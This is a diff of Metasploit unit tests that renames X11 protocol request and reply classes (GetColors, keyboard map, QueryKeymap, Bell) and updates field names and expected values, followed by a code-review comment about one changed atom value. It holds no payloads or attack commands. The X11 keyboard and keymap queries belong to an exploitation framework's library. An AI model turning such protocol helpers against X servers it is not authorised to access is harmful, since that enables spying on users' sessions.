13948116, 14013909, 
14079702, 14145495, 14211288, 14277081, 14342874, 14408667, 14474460, 14540253, 14606046, 14671839, 14737632, 14803425, 14869218, 14935011, 15000804, 15066597, 15132390, 15198183, 15263976, 15329769, 15395562, 15461355, 15527148, 15592941, 15658734, 15724527, 15790320, 15856113, 15921906, 15987699, 16053492, 16119285, 16185078, 16250871, 16316664, 16382457, 16448250, 16514043, 16579836, 16645629, 16711422, 16777215])
-
- request = Msf::Exploit::Remote::X11::Window::GETCOLORSREQUEST.new(
+ request = Msf::Exploit::Remote::X11::Window::X11GetColorsRequest.new(
color_map: 41943042,
pixels: [0, 65793, 131586, 197379, 263172, 328965, 394758, 460551, 526344, 592137, 657930, 723723, 789516, 855309, 921102, 986895, 1052688, 1118481, 1184274, 1250067, 1315860, 1381653, 1447446, 1513239, 1579032, 1644825, 1710618, 1776411, 1842204, 1907997, 1973790, 2039583, 2105376, 2171169, 2236962, 2302755, 2368548, 2434341, 2500134, 2565927, 2631720, 2697513, 2763306, 2829099, 2894892, 2960685, 3026478, 3092271, 3158064, 3223857, 3289650, 3355443, 3421236, 3487029, 3552822, 3618615, 3684408, 3750201, 3815994, 3881787, 3947580, 4013373, 4079166, 4144959, 4210752, 4276545, 4342338, 4408131, 4473924, 4539717, 4605510, 4671303, 4737096, 4802889, 4868682, 4934475, 5000268, 5066061, 5131854, 5197647, 5263440, 5329233, 5395026, 5460819, 5526612, 5592405, 5658198, 5723991, 5789784, 5855577, 5921370, 5987163, 6052956, 6118749, 6184542, 6250335, 6316128, 6381921, 6447714, 6513507, 6579300, 6645093, 6710886, 6776679, 6842472, 6908265, 6974058, 7039851, 7105644, 7171437, 7237230, 7303023, 7368816, 7434609, 7500402, 7566195, 7631988, 7697781, 7763574, 7829367, 7895160, 7960953, 8026746, 8092539, 8158332, 8224125, 8289918, 8355711, 8421504, 8487297, 8553090, 8618883, 8684676, 8750469, 8816262, 8882055, 8947848, 9013641, 9079434, 9145227, 9211020, 9276813, 9342606, 9408399, 9474192, 9539985, 9605778, 9671571, 9737364, 9803157, 9868950, 9934743, 10000536, 10066329, 10132122, 10197915, 10263708, 10329501, 10395294, 10461087, 10526880, 10592673, 10658466, 10724259, 10790052, 10855845, 10921638, 10987431, 11053224, 11119017, 11184810, 11250603, 11316396, 11382189, 11447982, 11513775, 11579568, 11645361, 11711154, 11776947, 11842740, 11908533, 11974326, 12040119, 12105912, 12171705, 12237498, 12303291, 12369084, 12434877, 12500670, 12566463, 12632256, 12698049, 12763842, 12829635, 12895428, 12961221, 13027014, 13092807, 13158600, 13224393, 13290186, 13355979, 13421772, 13487565, 13553358, 13619151, 13684944, 13750737, 13816530, 13882323, 13948116, 14013909, 14079702, 14145495, 
14211288, 14277081, 14342874, 14408667, 14474460, 14540253, 14606046, 14671839, 14737632, 14803425, 14869218, 14935011, 15000804, 15066597, 15132390, 15198183, 15263976, 15329769, 15395562, 15461355, 15527148, 15592941, 15658734, 15724527, 15790320, 15856113, 15921906, 15987699, 16053492, 16119285, 16185078, 16250871, 16316664, 16382457, 16448250, 16514043, 16579836, 16645629, 16711422, 16777215],
- unused: 2
+ pad0: 2
)
expect(request.to_binary_s).to eq(getcolors_request)
end
@@ -2932,13 +2930,12 @@
describe 'handles GetColors response' do
it do
# test against packet pulled from wireshark
- response = Msf::Exploit::Remote::X11::Window::GETCOLORSRESPONSE.read(getcolors_response)
+ response = Msf::Exploit::Remote::X11::Window::X11GetColorsResponse.read(getcolors_response)
expect(response.response_type).to eq(1)
expect(response.sequence).to eq(163)
- expect(response.reply_length).to eq(512)
+ expect(response.response_length).to eq(512)
expect(response.colors_len).to eq(256)
expect(response.colors.length).to eq(256)
end
end
-
end
diff --git a/spec/lib/msf/core/exploit/remote/x11/xkeyboard.rb b/spec/lib/msf/core/exploit/remote/x11/xkeyboard.rb
index 171893ea9e98..5fd180764fb3 100644
--- a/spec/lib/msf/core/exploit/remote/x11/xkeyboard.rb
+++ b/spec/lib/msf/core/exploit/remote/x11/xkeyboard.rb
@@ -383,10 +383,9 @@
"\x00\x00\x00\x00\x2e\x03\x00\x00\x00\x00\x00\x00"
end
-
describe 'handles xkeyboard GetMap response' do
it do
- response = Msf::Exploit::Remote::X11::Xkeyboard::GETMAPREPLY.read(get_keyboardmap_resp)
+ response = Msf::Exploit::Remote::X11::Xkeyboard::X11GetMapReply.read(get_keyboardmap_resp)
expect(response.min_key_code).to eq(8)
expect(response.max_key_code).to eq(255)
@@ -414,20 +413,22 @@
describe 'handles QueryKeymap response' do
it do
- response = Msf::Exploit::Remote::X11::Xkeyboard::QUERYKEYMAPREPLY.read(get_querykeymap_resp)
+ response = Msf::Exploit::Remote::X11::Xkeyboard::X11QueryKeyMapReply.read(get_querykeymap_resp)
expect(response.reply).to eq(1)
expect(response.sequence_number).to eq(9487)
- expect(response.reply_length).to eq(2)
- expect(response.data).to eq([0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\
- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
+ expect(response.response_length).to eq(2)
+ expect(response.data).to eq([
+ 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\
+ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
+ ])
end
end
describe 'creates QueryKeymap request' do
it do
- request = Msf::Exploit::Remote::X11::Xkeyboard::QUERYKEYMAPREQUEST.new()
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11QueryKeyMapRequest.new
expect(request.to_binary_s).to eq(key_map_request)
- request = Msf::Exploit::Remote::X11::Xkeyboard::QUERYKEYMAPREQUEST.read(key_map_request)
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11QueryKeyMapRequest.read(key_map_request)
expect(request.opcode).to eq(44)
end
end
@@ -435,7 +436,7 @@
describe 'creates new keyboard notify request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Xkeyboard::SELECTEVENTS.read(keyboard_select_events_new_keyboard_notify)
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11SelectEvents.read(keyboard_select_events_new_keyboard_notify)
expect(request.xkeyboard_id).to eq(136)
expect(request.extension_minor).to eq(1)
expect(request.request_length).to eq(5)
@@ -444,7 +445,7 @@
expect(request.affect_new_keyboard_key_codes).to eq(1)
expect(request.affect_new_keyboard_device_id).to eq(1)
# build packet and ensure it matches
- request = Msf::Exploit::Remote::X11::Xkeyboard::SELECTEVENTS.new(
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11SelectEvents.new(
xkeyboard_id: 136,
extension_minor: 1,
device_spec: 3,
@@ -461,7 +462,7 @@
describe 'creates map notify request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Xkeyboard::SELECTEVENTS.read(keyboard_select_events_map_notify)
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11SelectEvents.read(keyboard_select_events_map_notify)
expect(request.xkeyboard_id).to eq(136)
expect(request.extension_minor).to eq(1)
expect(request.request_length).to eq(4)
@@ -470,7 +471,7 @@
expect(request.map_key_types).to eq(1)
expect(request.map_key_syms).to eq(1)
expect(request.map_modifier_map).to eq(1)
- request = Msf::Exploit::Remote::X11::Xkeyboard::SELECTEVENTS.new(
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11SelectEvents.new(
xkeyboard_id: 136,
extension_minor: 1,
device_spec: 3,
@@ -488,7 +489,7 @@
describe 'creates bell request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Xkeyboard::BELLREQUEST.read(set_bell)
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11BellRequest.read(set_bell)
expect(request.xkeyboard_id).to eq(136)
expect(request.extension_minor).to eq(3)
expect(request.request_length).to eq(7)
@@ -497,17 +498,17 @@
expect(request.bell_id).to eq(1024)
expect(request.percent).to eq(50)
expect(request.force_sound).to eq(0)
- expect(request.event_only).to eq(0)
+ expect(request.sound_only).to eq(0)
expect(request.pitch).to eq(0)
expect(request.duration).to eq(0)
expect(request.window).to eq(0)
- expect(request.name).to eq(816)
+ expect(request.name).to eq(814)
- request = Msf::Exploit::Remote::X11::Xkeyboard::BELLREQUEST.new(
- xkeyboard_id: 136,
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11BellRequest.new(
+ xkeyboard_id: 136
)
expect(request.to_binary_s).to eq(set_bell)
end
end
end
-end
\ No newline at end of file
+end
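Review bot: The expected atom in `expect(request.name).to eq(814)` changed from 816 and `event_only` became `sound_only`, but the `set_bell` fixture is not touched in these hunks, so the record's field layout or defaults must have changed elsewhere in the commit. Since `X11BellRequest.new(xkeyboard_id: 136).to_binary_s` is expected to equal the whole capture, the defaults are evidently tied to that one capture. A comment such as `# 814: atom id carried in the wireshark capture` next to the assertion would tell the next reader where the number comes from. One further example that sets `name` and `percent` explicitly would cover more than the defaults.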